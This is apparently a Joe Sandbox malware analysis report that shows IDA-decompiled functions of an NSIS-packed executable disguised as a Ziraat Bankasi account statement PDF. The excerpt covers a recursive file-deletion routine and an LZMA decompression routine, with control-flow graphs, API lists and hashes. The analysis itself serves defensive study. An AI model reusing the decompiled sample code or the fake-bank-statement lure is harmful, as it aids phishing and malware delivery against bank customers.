                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                              • String ID: "C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                              • API String ID: 2292928366-714854088
                                                                                              • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                                                              • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                                                              • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                                                              • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                                                                                              C-Code - Quality: 98%
                                                                                              			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                                              0x00405d7e
                                                                                              0x00405d83
                                                                                              0x00405d8c
                                                                                              0x00405d8f
                                                                                              0x00405d97
                                                                                              0x00405d9a
                                                                                              0x00405d9d
                                                                                              0x00405da5
                                                                                              0x00405da7
                                                                                              0x00405da8
                                                                                              0x00000000
                                                                                              0x00405da8
                                                                                              0x00405db3
                                                                                              0x00405db6
                                                                                              0x00405db6
                                                                                              0x00405db6
                                                                                              0x00405dba
                                                                                              0x00405dcd
                                                                                              0x00405dd4
                                                                                              0x00405dd9
                                                                                              0x00405ddd
                                                                                              0x00405ded
                                                                                              0x00405ddf
                                                                                              0x00405de5
                                                                                              0x00405de5
                                                                                              0x00405df2
                                                                                              0x00405df6
                                                                                              0x00405e02
                                                                                              0x00405e08
                                                                                              0x00405e0d
                                                                                              0x00405e13
                                                                                              0x00405e1e
                                                                                              0x00405e24
                                                                                              0x00405e26
                                                                                              0x00405e29
                                                                                              0x00405ed3
                                                                                              0x00405ed3
                                                                                              0x00405ed7
                                                                                              0x00405ed9
                                                                                              0x00405ed9
                                                                                              0x00405ed9
                                                                                              0x00405ed9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405e2f
                                                                                              0x00405e2f
                                                                                              0x00405e2f
                                                                                              0x00405e37
                                                                                              0x00405e57
                                                                                              0x00405e5f
                                                                                              0x00405e64
                                                                                              0x00405e6b
                                                                                              0x00405e86
                                                                                              0x00405e8b
                                                                                              0x00405e8d
                                                                                              0x00405eb1
                                                                                              0x00405e8f
                                                                                              0x00405e8f
                                                                                              0x00405e92
                                                                                              0x00405ea6
                                                                                              0x00405e94
                                                                                              0x00405e97
                                                                                              0x00405e9f
                                                                                              0x00405e9f
                                                                                              0x00405e92
                                                                                              0x00405e6d
                                                                                              0x00405e73
                                                                                              0x00405e75
                                                                                              0x00405e7b
                                                                                              0x00405e7b
                                                                                              0x00405e75
                                                                                              0x00000000
                                                                                              0x00405e6b
                                                                                              0x00405e39
                                                                                              0x00405e41
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405e43
                                                                                              0x00405e4b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405e4d
                                                                                              0x00405e55
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405eb6
                                                                                              0x00405ebe
                                                                                              0x00405ec4
                                                                                              0x00405ec4
                                                                                              0x00405ecd
                                                                                              0x00000000
                                                                                              0x00405ecd
                                                                                              0x00405df8
                                                                                              0x00405e00
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405dbc
                                                                                              0x00405dbc
                                                                                              0x00405dbe
                                                                                              0x00405ede
                                                                                              0x00405ee0
                                                                                              0x00405ee3
                                                                                              0x00405f34
                                                                                              0x00405f34
                                                                                              0x00405f34
                                                                                              0x00405ee5
                                                                                              0x00405ee8
                                                                                              0x00405ef3
                                                                                              0x00405ef8
                                                                                              0x00405efa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405efd
                                                                                              0x00405f09
                                                                                              0x00405f0e
                                                                                              0x00405f10
                                                                                              0x00000000
                                                                                              0x00405f2b
                                                                                              0x00405f12
                                                                                              0x00405f15
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405f1a
                                                                                              0x00000000
                                                                                              0x00405f21
                                                                                              0x00405eea
                                                                                              0x00405eea
                                                                                              0x00000000
                                                                                              0x00405eea
                                                                                              0x00405dc4
                                                                                              0x00405dc7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405dc7

                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(?,?,74D0FAA0,74D0F560,00000000), ref: 00405D9D
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz97CF.tmp\*.*,\*.*), ref: 00405DE5
                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsz97CF.tmp\*.*,?,?,74D0FAA0,74D0F560,00000000), ref: 00405E0E
                                                                                              • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsz97CF.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsz97CF.tmp\*.*,?,?,74D0FAA0,74D0F560,00000000), ref: 00405E1E
                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                                              • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                              • String ID: .$.$C:\Users\user\AppData\Local\Temp\nsz97CF.tmp\*.*$\*.*
                                                                                              • API String ID: 2035342205-1046043838
                                                                                              • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                                                              • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                                                              • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                                                              • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 553 406d5f-406d64 554 406dd5-406df3 553->554 555 406d66-406d95 553->555 556 4073cb-4073e0 554->556 557 406d97-406d9a 555->557 558 406d9c-406da0 555->558 559 4073e2-4073f8 556->559 560 4073fa-407410 556->560 561 406dac-406daf 557->561 562 406da2-406da6 558->562 563 406da8 558->563 564 407413-40741a 559->564 560->564 565 406db1-406dba 561->565 566 406dcd-406dd0 561->566 562->561 563->561 570 407441-40744d 564->570 571 40741c-407420 564->571 567 406dbc 565->567 568 406dbf-406dcb 565->568 569 406fa2-406fc0 566->569 567->568 572 406e35-406e63 568->572 576 406fc2-406fd6 569->576 577 406fd8-406fea 569->577 579 406be3-406bec 570->579 573 407426-40743e 571->573 574 4075cf-4075d9 571->574 580 406e65-406e7d 572->580 581 406e7f-406e99 572->581 573->570 578 4075e5-4075f8 574->578 582 406fed-406ff7 576->582 577->582 586 4075fd-407601 578->586 583 406bf2 579->583 584 4075fa 579->584 585 406e9c-406ea6 580->585 581->585 587 406ff9 582->587 588 406f9a-406fa0 582->588 590 406bf9-406bfd 583->590 591 406d39-406d5a 583->591 592 406c9e-406ca2 583->592 593 406d0e-406d12 583->593 584->586 595 406eac 585->595 596 406e1d-406e23 585->596 604 407581-40758b 587->604 605 406f7f-406f97 587->605 588->569 594 406f3e-406f48 588->594 590->578 597 406c03-406c10 590->597 591->556 606 406ca8-406cc1 592->606 607 40754e-407558 592->607 598 406d18-406d2c 593->598 599 40755d-407567 593->599 600 40758d-407597 594->600 601 406f4e-407117 594->601 612 406e02-406e1a 595->612 613 407569-407573 595->613 602 406ed6-406edc 596->602 603 406e29-406e2f 596->603 597->584 611 406c16-406c5c 597->611 614 406d2f-406d37 598->614 599->578 600->578 601->579 609 406f3a 602->609 610 406ede-406efc 602->610 603->572 603->609 604->578 605->588 616 406cc4-406cc8 606->616 607->578 609->594 617 406f14-406f26 610->617 618 406efe-406f12 610->618 619 406c84-406c86 611->619 620 406c5e-406c62 611->620 612->596 613->578 614->591 614->593 616->592 621 406cca-406cd0 616->621 624 406f29-406f33 617->624 618->624 627 406c94-406c9c 619->627 628 406c88-406c92 619->628 625 406c64-406c67 GlobalFree 620->625 626 406c6d-406c7b GlobalAlloc 620->626 622 406cd2-406cd9 621->622 623 406cfa-406d0c 621->623 629 406ce4-406cf4 GlobalAlloc 622->629 630 406cdb-406cde GlobalFree 622->630 623->614 624->602 631 406f35 624->631 625->626 626->584 632 406c81 626->632 627->616 628->627 628->628 629->584 629->623 630->629 634 407575-40757f 631->634 635 406ebb-406ed3 631->635 632->619 634->578 635->602
                                                                                              C-Code - Quality: 98%
                                                                                              			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
